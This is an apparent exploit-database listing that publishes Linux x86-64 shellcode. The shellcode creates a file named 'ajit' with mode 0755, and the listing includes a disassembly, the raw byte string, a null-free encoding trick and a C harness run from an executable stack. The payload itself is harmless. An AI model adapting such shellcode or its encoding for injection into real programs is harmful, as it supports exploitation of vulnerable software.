Share
## https://sploitus.com/exploit?id=1337DAY-ID-33701
/*
---------------------------------------------------------------------------------------------------
 
Linux/x86_x64 - sys_creat("ajit", 0755) - 53 bytes
 
Ajith Kp          [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Vishnu Nath Kp    [ http://www.terminalcoders.blogspot.com ]
Sayooj S Nambiar  [ http://fb.com/sayooj.sivadas ]
 
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
 
---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080:  eb 2a                  jmp    0x4000ac
  400082:  5f                     pop    %rdi
  400083:  68 e0 f2 5b 2e         pushq  $0x2e5bf2e0
  400088:  5e                     pop    %rsi
  400089:  48 81 ee e1 f0 5b 2e   sub    $0x2e5bf0e1,%rsi
  400090:  68 e0 f2 5b 2e         pushq  $0x2e5bf2e0
  400095:  58                     pop    %rax
  400096:  48 2d 8b f2 5b 2e      sub    $0x2e5bf28b,%rax
  40009c:  0f 05                  syscall 
  40009e:  68 e0 f2 5b 2e         pushq  $0x2e5bf2e0
  4000a3:  58                     pop    %rax
  4000a4:  48 2d a4 f2 5b 2e      sub    $0x2e5bf2a4,%rax
  4000aa:  0f 05                  syscall 
  4000ac:  e8 d1 ff ff ff         callq  0x400082
  4000b1:  61                     (bad)  
  4000b2:  6a 69                  pushq  $0x69
  4000b4:  74                     .byte 0x74
---------------------------------------------------------------------------------------------------
 
How To Run
 
$ gcc -o syscreat_shellcode_linux_x64 syscreat_shellcode_linux_x64.c -z execstack
$ ./syscreat_shellcode_linux_x64
 
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x2a\x5f\x68\xe0\xf2\x5b\x2e\x5e\x48\x81\xee\xe1\xf0\x5b\x2e\x68\xe0\xf2\x5b\x2e\x58\x48\x2d\x8b\xf2\x5b\x2e\x0f\x05\x68\xe0\xf2\x5b\x2e\x58\x48\x2d\xa4\xf2\x5b\x2e\x0f\x05\xe8\xd1\xff\xff\xff\x61\x6a\x69\x74";
void main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) sh;
    (int)(*func)();
}

#  0day.today [2020-01-04]  #